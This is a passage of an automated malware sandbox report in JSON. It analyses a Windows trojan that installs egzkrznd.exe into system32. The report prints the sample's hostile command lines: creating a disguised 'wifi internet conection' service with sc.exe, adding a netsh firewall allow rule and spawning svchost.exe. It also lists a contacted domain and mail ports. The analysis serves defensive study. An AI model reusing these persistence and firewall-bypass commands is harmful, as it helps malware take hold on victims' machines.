parameter LocalFree (UID: 00000000-00001396)\n \"egzkrznd.exe\" called \"GetProcAddress\" with a parameter GetFileAttributesExA (UID: 00000000-00001396)\n \"egzkrznd.exe\" called \"GetProcAddress\" with a parameter LocalAlloc (UID: 00000000-00001396)\n \"egzkrznd.exe\" called \"GetProcAddress\" with a parameter CreateProcessA (UID: 00000000-00001396)\n \"egzkrznd.exe\" called \"GetProcAddress\" with a parameter GetTempPathA (UID: 00000000-00001396)\n \"egzkrznd.exe\" called \"GetProcAddress\" with a parameter SystemTimeToFileTime (UID: 00000000-00001396)\n \"egzkrznd.exe\" called \"GetProcAddress\" with a parameter GetSystemTime (UID: 00000000-00001396)\n \"egzkrznd.exe\" called \"GetProcAddress\" with a parameter DeviceIoControl (UID: 00000000-00001396)\n \"egzkrznd.exe\" called \"GetProcAddress\" with a parameter CreateFileW (UID: 00000000-00001396)\n \"egzkrznd.exe\" called \"GetProcAddress\" with a parameter GetModuleFileNameA (UID: 00000000-00001396)\n \"egzkrznd.exe\" called \"GetProcAddress\" with a parameter ResumeThread (UID: 00000000-00001396)\n \"egzkrznd.exe\" called \"GetProcAddress\" with a parameter SetThreadContext (UID: 00000000-00001396)\n \"egzkrznd.exe\" called \"GetProcAddress\" with a parameter GetThreadContext (UID: 00000000-00001396)\n \"egzkrznd.exe\" called \"GetProcAddress\" with a parameter lstrcatA (UID: 00000000-00001396)\n \"egzkrznd.exe\" called \"GetProcAddress\" with a parameter CreateThread (UID: 00000000-00001396)\n \"egzkrznd.exe\" called \"GetProcAddress\" with a parameter GetDriveTypeA (UID: 00000000-00001396)\n \"egzkrznd.exe\" called \"GetProcAddress\" with a parameter GetCommandLineA (UID: 00000000-00001396)\n \"egzkrznd.exe\" called \"GetProcAddress\" with a parameter SetUnhandledExceptionFilter (UID: 00000000-00001396)\n \"egzkrznd.exe\" called \"GetProcAddress\" with a parameter InterlockedIncrement (UID: 00000000-00001396)\n \"egzkrznd.exe\" called \"GetProcAddress\" with a parameter GetLocalTime (UID: 00000000-00001396)\n \"egzkrznd.exe\" called \"GetProcAddress\" with a parameter GetTimeZoneInformation (UID: 00000000-00001396)\n \"egzkrznd.exe\" called \"GetProcAddress\" with a parameter FileTimeToLocalFileTime (UID: 00000000-00001396)\n \"egzkrznd.exe\" called \"GetProcAddress\" with a parameter FileTimeToSystemTime (UID: 00000000-00001396)\n \"egzkrznd.exe\" called \"GetProcAddress\" with a parameter InterlockedDecrement (UID: 00000000-00001396)\n \"egzkrznd.exe\" called \"GetProcAddress\" with a parameter HeapSize (UID: 00000000-00001396)\n \"egzkrznd.exe\" called \"GetProcAddress\" with a parameter GetSystemTimeAsFileTime (UID: 00000000-00001396)\n \"egzkrznd.exe\" called \"GetProcAddress\" with a parameter MultiByteToWideChar (UID: 00000000-00001396)\n \"egzkrznd.exe\" called \"GetProcAddress\" with a parameter lstrlenW (UID: 00000000-00001396)\n \"egzkrznd.exe\" called \"GetProcAddress\" with a parameter GetStartupInfoW (UID: 00000000-00001396)\n \"egzkrznd.exe\" called \"GetProcAddress\" with a parameter GetProcessHeap (UID: 00000000-00001396)\n \"egzkrznd.exe\" called \"GetProcAddress\" with a parameter HeapAlloc (UID: 00000000-00001396)\n \"egzkrznd.exe\" called \"GetProcAddress\" with a parameter HeapReAlloc (UID: 00000000-00001396)\n \"egzkrznd.exe\" called \"GetProcAddress\" with a parameter HeapFree (UID: 00000000-00001396)\n \"egzkrznd.exe\" called \"GetProcAddress\" with a parameter FreeLibrary (UID: 00000000-00001396)\n \"egzkrznd.exe\" called \"GetProcAddress\" with a parameter CreateEventA (UID: 00000000-00001396)\n \"egzkrznd.exe\" called \"GetProcAddress\" with a parameter GetSystemDirectoryA (UID: 00000000-00001396)\n \"egzkrznd.exe\" called \"GetProcAddress\" with a parameter wsprintfA (UID: 00000000-00001396)\n \"egzkrznd.exe\" called \"GetProcAddress\" with a parameter CharToOemA (UID: 00000000-00001396)\n \"egzkrznd.exe\" called \"GetProcAddress\" with a parameter ConvertSidToStringSidA (UID: 00000000-00001396)\n \"egzkrznd.exe\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00001396)\n \"egzkrznd.exe\" called \"GetProcAddress\" with a parameter CreateProcessWithLogonW (UID: 00000000-00001396)\n \"egzkrznd.exe\" called \"GetProcAddress\" with a parameter RegCreateKeyExA (UID: 00000000-00001396)\n \"egzkrznd.exe\" called \"GetProcAddress\" with a parameter StartServiceCtrlDispatcherA (UID: 00000000-00001396)\n \"egzkrznd.exe\" called \"GetProcAddress\" with a parameter RegisterServiceCtrlHandlerA (UID: 00000000-00001396)\n \"egzkrznd.exe\" called \"GetProcAddress\" with a parameter SetServiceStatus (UID: 00000000-00001396)\n \"egzkrznd.exe\" called \"GetProcAddress\" with a parameter RegDeleteValueA (UID: 00000000-00001396)\n \"egzkrznd.exe\" called \"GetProcAddress\" with a parameter RegGetKeySecurity (UID: 00000000-00001396)\n \"egzkrznd.exe\" called \"GetProcAddress\" with a parameter RegSetKeySecurity (UID: 00000000-00001396)\n \"egzkrznd.exe\" called \"GetProcAddress\" with a parameter RegSetValueExA (UID: 00000000-00001396)\n \"egzkrznd.exe\" called \"GetProcAddress\" with a parameter GetLengthSid (UID: 00000000-00001396)\n \"egzkrznd.exe\" called \"GetProcAddress\" with a parameter GetFileSecurityA (UID: 00000000-00001396)\n \"egzkrznd.exe\" called \"GetProcAddress\" with a parameter GetSecurityDescriptorOwner (UID: 00000000-00001396)\n \"egzkrznd.exe\" called \"GetProcAddress\" with a parameter EqualSid (UID: 00000000-00001396)\n \"egzkrznd.exe\" called \"GetProcAddress\" with a parameter InitializeSecurityDescriptor (UID: 00000000-00001396)\n \"egzkrznd.exe\" called \"GetProcAddress\" with a parameter SetSecurityDescriptorOwner (UID: 00000000-00001396)\n \"egzkrznd.exe\" called \"GetProcAddress\" with a parameter SetFileSecurityA (UID: 00000000-00001396)\n \"egzkrznd.exe\" called \"GetProcAddress\" with a parameter GetSecurityDescriptorDacl (UID: 00000000-00001396)\n \"egzkrznd.exe\" called \"GetProcAddress\" with a parameter GetAce (UID: 00000000-00001396)\n \"egzkrznd.exe\" called \"GetProcAddress\" with a parameter DeleteAce (UID: 00000000-00001396)\n \"egzkrznd.exe\" called \"GetProcAddress\" with a parameter SetSecurityDescriptorDacl (UID: 00000000-00001396)\n \"egzkrznd.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExA (UID: 00000000-00001396)\n \"egzkrznd.exe\" called \"GetProcAddress\" with a parameter RegEnumKeyA (UID: 00000000-00001396)\n \"egzkrznd.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExA (UID: 00000000-00001396)\n \"egzkrznd.exe\" called \"GetProcAddress\" with a parameter RegEnumValueA (UID: 00000000-00001396)\n \"egzkrznd.exe\" called \"GetProcAddress\" with a parameter GetUserNameW (UID: 00000000-00001396)\n \"egzkrznd.exe\" called \"GetProcAddress\" with a parameter LookupAccountNameW (UID: 00000000-00001396)\n \"egzkrznd.exe\" called \"GetProcAddress\" with a parameter LookupAccountNameA (UID: 00000000-00001396)\n \"egzkrznd.exe\" called \"GetProcAddress\" with a parameter GetUserNameA (UID: 00000000-00001396)\n \"egzkrznd.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00001396)\n \"egzkrznd.exe\" called \"GetProcAddress\" with a parameter CheckTokenMembership (UID: 00000000-00001396)\n \"egzkrznd.exe\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00001396)\n \"egzkrznd.exe\" called \"GetProcAddress\" with a parameter ShellExecuteA (UID: 00000000-00001396)\n \"egzkrznd.exe\" called \"GetProcAddress\" with a parameter ShellExecuteExW (UID: 00000000-00001396)\n \"egzkrznd.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00001396)\n \"egzkrznd.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00001396)\n \"egzkrznd.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00001396)\n \"egzkrznd.exe\" called \"GetProcAddress\" with a parameter atexit (UID: 00000000-00001396)\n \"egzkrznd.exe\" called \"GetProcAddress\" with a parameter GetSystemWow64DirectoryA (UID: 00000000-00001396)\n \"egzkrznd.exe\" called \"GetProcAddress\" with a parameter GetUserNameExW (UID: 00000000-00001396)\n \"egzkrznd.exe\" called \"GetProcAddress\" with a parameter LookupAccountNameLocalW (UID: 00000000-00001396)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00003360)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter InitHelperDll (UID: 00000000-00003360)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExW (UID: 00000000-00003360)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CoInitializeEx (UID: 00000000-00003360)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter ThemeInitApiHook (UID: 00000000-00003360)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter IsProcessDPIAware (UID: 00000000-00003360)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CryptEnumProvidersW (UID: 00000000-00003360)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter LoadStringW (UID: 00000000-00003360)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RegCreateKeyExW (UID: 00000000-00003360)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00003360)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00003360)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter OpenSCManagerW (UID: 00000000-00003360)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter OpenServiceW (UID: 00000000-00003360)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter QueryServiceConfigW (UID: 00000000-00003360)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CloseServiceHandle (UID: 00000000-00003360)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter QueryServiceStatus (UID: 00000000-00003360)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RegQueryInfoKeyW (UID: 00000000-00003360)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RegEnumKeyExW (UID: 00000000-00003360)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CoTaskMemFree (UID: 00000000-00003360)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter LookupAccountSidLocalW (UID: 00000000-00003360)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00003360)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter OpenProcessToken (UID: 00000000-00003360)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter GetTokenInformation (UID: 00000000-00003360)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00003360)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter EqualSid (UID: 00000000-00003360)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00003360)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter SystemFunction036 (UID: 00000000-00003360)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter HttpInitialize (UID: 00000000-00003360)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RegisterGPNotification (UID: 00000000-00003360)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter UnregisterGPNotification (UID: 00000000-00003360)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter GetHashInterface (UID: 00000000-00003360)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter GetCipherInterface (UID: 00000000-00003360)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter SetThreadUILanguage (UID: 00000000-00003360)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CoUninitialize (UID: 00000000-00003360)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter HttpTerminate (UID: 00000000-00003360)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00003360)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00003900)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter IsWow64Process (UID: 00000000-00003900)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter _alldiv (UID: 00000000-00003900)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetAdaptersInfo (UID: 00000000-00003900)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetIfEntry (UID: 00000000-00003900)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetBestInterface (UID: 00000000-00003900)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetAdaptersAddresses (UID: 00000000-00003900)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ConvertStringSecurityDescriptorToSecurityDescriptorW (UID: 00000000-00003900)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetUserNameExA (UID: 00000000-00003900)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter LookupAccountNameLocalA (UID: 00000000-00003900)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter DnsQuery_A (UID: 00000000-00003900)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"15001600c03e196b@ADVAPI32.dll\"\n \"0e000f00703f196b@ADVAPI32.dll\"\n \"0e000f00cc3f196b@ADVAPI32.dll\"\n \"11001200b447196b@ADVAPI32.dll\"\n \"110012004848196b@ADVAPI32.dll\"\n \"120013008c48196b@ADVAPI32.dll\"\n \"12001300e448196b@ADVAPI32.dll\"\n \"14001500dc6f196b@ADVAPI32.dll\"\n \"14001500f46f196b@ADVAPI32.dll\"\n \"140015000c70196b@ADVAPI32.dll\"\n \"170018002470196b@ADVAPI32.dll\"\n \"0d000e003c70196b@ADVAPI32.dll\"\n \"110012004c70196b@ADVAPI32.dll\"\n \"110012006070196b@ADVAPI32.dll\"\n \"0d000e003449196b@SHELL32.dll\"\n \"0d000e00b049196b@SHELL32.dll\"\n \"0f001000a071196b@ADVAPI32.dll\"\n \"14001500e071196b@ADVAPI32.dll\"\n \"14001500f871196b@ADVAPI32.dll\"\n \"0c000d004072196b@ADVAPI32.dll\"\n \"0c000d005072196b@ADVAPI32.dll\"\n \"0e000f006072196b@ADVAPI32.dll\"\n \"0e000f007072196b@ADVAPI32.dll\"\n \"0b000c008072196b@ADVAPI32.dll\"\n \"14001500b473196b@SETUPAPI.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"egzkrznd.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48\" file has an entrypoint instructions - \"call\t0x401930,jmp\t0x401416,push\tebp,mov\tebp, esp,push\t0,call\tdword ptr [0x40c034],push\tdword ptr [ebp + 8],call\tdword ptr [0x40c030],push\t0xc0000409,call\tdword ptr [0x40c00c],push\teax,call\tdword ptr [0x40c038],pop\tebp,ret\t,push\tebp,mov\tebp, esp,sub\tesp, 0x324,push\t0x17,call\t0x40a716,test\teax, eax,je\t0x4015c9,push\t2,pop\tecx,int\t0x29,mov\tdword ptr [0x4146b0], eax,mov\tdword ptr [0x4146ac], ecx,mov\tdword ptr [0x4146a8], edx,mov\tdword ptr [0x4146a4], ebx,\"\n \"egzkrznd.exe\" file has an entrypoint instructions - \"call\t0x401930,jmp\t0x401416,push\tebp,mov\tebp, esp,push\t0,call\tdword ptr [0x40c034],push\tdword ptr [ebp + 8],call\tdword ptr [0x40c030],push\t0xc0000409,call\tdword ptr [0x40c00c],push\teax,call\tdword ptr [0x40c038],pop\tebp,ret\t,push\tebp,mov\tebp, esp,sub\tesp, 0x324,push\t0x17,call\t0x40a716,test\teax, eax,je\t0x4015c9,push\t2,pop\tecx,int\t0x29,mov\tdword ptr [0x4146b0], eax,mov\tdword ptr [0x4146ac], ecx,mov\tdword ptr [0x4146a8], edx,mov\tdword ptr [0x4146a4], ebx,\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-122", "type": 6, "relevance": 3, "name": "Calls an API typically used to create a directory", "description": "\"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00005872)", "origin": "API Call", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-128", "type": 6, "relevance": 5, "name": "Calls an API typically used to create a process", "description": "\"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\cmd.exe\" /C mkdir %WINDIR%\\system32\\zvdnuoqu\\\" - (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\cmd.exe\" /C move /Y \"%TEMP%\\egzkrznd.exe\" %WINDIR%\\system32\\zvdnuoqu\\\" - (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\sc.exe\" create zvdnuoqu binPath= \"%WINDIR%\\system32\\zvdnuoqu\\egzkrznd.exe /d\\\"C:\\189a5558a4cb373f8c8035808f\" - (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\sc.exe\" description zvdnuoqu \"wifi internet conection\"\" - (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\sc.exe\" start zvdnuoqu\" - (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\netsh.exe\" advfirewall firewall add rule name=\"Host-process for services of Windows\" dir=in action=allow prog\" - (UID: 00000000-00005872)\n \"egzkrznd.exe\" called \"CreateProcessA\" with parameter \"svchost.exe\" - (UID: 00000000-00001396)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 764B0000\n \"cmd.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 764B0000\n \"sc.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 764B0000\n \"egzkrznd.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 764B0000\n \"netsh.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 764B0000\n \"svchost.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 764B0000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-25", "type": 3, "relevance": 3, "name": "Reads information about supported languages", "description": "\"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LOCALE\"; Key: \"00000409\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"cmd.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"cmd.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"sc.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"sc.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-67", "type": 9, "relevance": 10, "name": "Process launched with changed environment", "description": "Process \"cmd.exe\" (UID: 00000000-00004004) was launched with new environment variables: \"USERDNSDOMAIN=\"%OSUSER%-PC\"\"\n Process \"cmd.exe\" (UID: 00000000-00004004) was launched with modified environment variables: \"NUMBER_OF_PROCESSORS\"\n Process \"egzkrznd.exe\" (UID: 00000000-00001396) was launched with modified environment variables: \"LOCALAPPDATA, USERDOMAIN, APPDATA, USERNAME, Path, TEMP, USERPROFILE, TMP, NUMBER_OF_PROCESSORS\"\n Process \"egzkrznd.exe\" (UID: 00000000-00001396) was launched with missing environment variables: \"LOGONSERVER, USERDNSDOMAIN, HOMEPATH, HOMEDRIVE\"\n Process \"netsh.exe\" (UID: 00000000-00003360) was launched with new environment variables: \"LOGONSERVER=\"%HOSTNAME%\", USERDNSDOMAIN=\"%OSUSER%-PC\", HOMEPATH=\"\\Users\\%OSUSER%\", HOMEDRIVE=\"C:\"\"\n Process \"netsh.exe\" (UID: 00000000-00003360) was launched with modified environment variables: \"LOCALAPPDATA, USERDOMAIN, APPDATA, USERNAME, Path, TEMP, USERPROFILE, TMP, NUMBER_OF_PROCESSORS\"\n Process \"svchost.exe\" (UID: 00000000-00003900) was launched with modified environment variables: \"LOCALAPPDATA, USERDOMAIN, APPDATA, USERNAME, USERDNSDOMAIN, Path, TEMP, USERPROFILE, TMP\"\n Process \"svchost.exe\" (UID: 00000000-00003900) was launched with missing environment variables: \"LOGONSERVER, HOMEPATH, HOMEDRIVE\"", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-275", "type": 6, "relevance": 3, "name": "Calls an API typically used to create a named pipe", "description": "\"svchost.exe\" called \"CreateNamedPipeA\" with parameter \"\\\\.\\pipe\\uqyipjlp\"\n dwOpenMode: \"1073741827\"\n dwPipeMode: \"0\" - (UID: 00000000-00003900)", "origin": "API Call", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-103", "type": 9, "relevance": 3, "name": "Spawns new processes that are not known child processes", "description": "Spawned process \"cmd.exe\" with commandline \"/C mkdir %WINDIR%\\\\system32\\\\zvdnuoqu\\\\\" (UID: 00000000-00004004)\n Spawned process \"cmd.exe\" with commandline \"/C move /Y \"%TEMP%\\\\egzkrznd.exe\" %WINDIR%\\\\system32\\\\zvdnuoqu\\\\\" (UID: 00000000-00004000)\n Spawned process \"sc.exe\" with commandline \"create zvdnuoqu binPath= \"%WINDIR%\\\\system32\\\\zvdnuoqu\\\\egzkrznd ...\" (UID: 00000000-00006044), Spawned process \"sc.exe\" with commandline \"description zvdnuoqu \"wifi internet conection\"\" (UID: 00000000-00004236), Spawned process \"sc.exe\" with commandline \"start zvdnuoqu\" (UID: 00000000-00004152), Spawned process \"egzkrznd.exe\" with commandline \"/d\"C:\\\\189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb3 ...\" (UID: 00000000-00001396)\n Spawned process \"netsh.exe\" with commandline \"advfirewall firewall add rule name=\"Host-process for services of ...\" (UID: 00000000-00003360), Spawned process \"svchost.exe\" (UID: 00000000-00003900)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-302", "type": 9, "relevance": 3, "name": "Tries to move files", "description": "Process \"cmd.exe\" with commandline \"/C move /Y \"%TEMP%\\\\egzkrznd.exe\" %WINDIR%\\\\system32\\\\zvdnuoqu\\\\\" (UID: 00000000-00004000)", "origin": "Monitored Target", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-25", "type": 9, "relevance": 3, "name": "Spawns new processes", "description": "Spawned process \"cmd.exe\" with commandline \"/C mkdir %WINDIR%\\\\system32\\\\zvdnuoqu\\\\\" (UID: 00000000-00004004)\n Spawned process \"cmd.exe\" with commandline \"/C move /Y \"%TEMP%\\\\egzkrznd.exe\" %WINDIR%\\\\system32\\\\zvdnuoqu\\\\\" (UID: 00000000-00004000)\n Spawned process \"sc.exe\" with commandline \"create zvdnuoqu binPath= \"%WINDIR%\\\\system32\\\\zvdnuoqu\\\\egzkrznd ...\" (UID: 00000000-00006044), Spawned process \"sc.exe\" with commandline \"description zvdnuoqu \"wifi internet conection\"\" (UID: 00000000-00004236), Spawned process \"sc.exe\" with commandline \"start zvdnuoqu\" (UID: 00000000-00004152), Spawned process \"egzkrznd.exe\" with commandline \"/d\"C:\\\\189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb3 ...\" (UID: 00000000-00001396)\n Spawned process \"netsh.exe\" with commandline \"advfirewall firewall add rule name=\"Host-process for services of ...\" (UID: 00000000-00003360), Spawned process \"svchost.exe\" (UID: 00000000-00003900)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48\" was detected as \"EP:Microsoft Visual C/C++\" and name: \"Compiler\"\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48\" was detected as \"Microsoft Visual C/C++\" and name: \"Compiler\"\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"egzkrznd.exe\" was detected as \"EP:Microsoft Visual C/C++\" and name: \"Compiler\"\n \"egzkrznd.exe\" was detected as \"Microsoft Visual C/C++\" and name: \"Compiler\"\n \"egzkrznd.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-1", "type": 7, "relevance": 1, "name": "Contacts server", "description": "\"<IPv4>:25\"\n \"<IPv4>:443\"\n \"<IPv4>:443\"", "origin": "Network Traffic", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-51", "type": 7, "relevance": 1, "name": "Queries DNS server", "description": "\"lazystax.ru\"\n \"microsoft-com.mail.protection.outlook.com\"", "origin": "Network Traffic", "attck_id": "T1071.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/004"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48\" has an executable section named \".text\"\n \"egzkrznd.exe\" has an executable section named \".text\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48\" has an writable section named \".data\"\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48\" has an writable section named \".text\"\n \"egzkrznd.exe\" has an writable section named \".data\"\n \"egzkrznd.exe\" has an writable section named \".text\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-125", "relevance": 3, "name": "PE file has a big raw size section", "description": "Raw size of \".reloc\" is \"0xaf3000\" greater than 0x100000\n Raw size of \".reloc\" is \"0xec2000\" greater than 0x100000", "origin": "Static Parser"}, 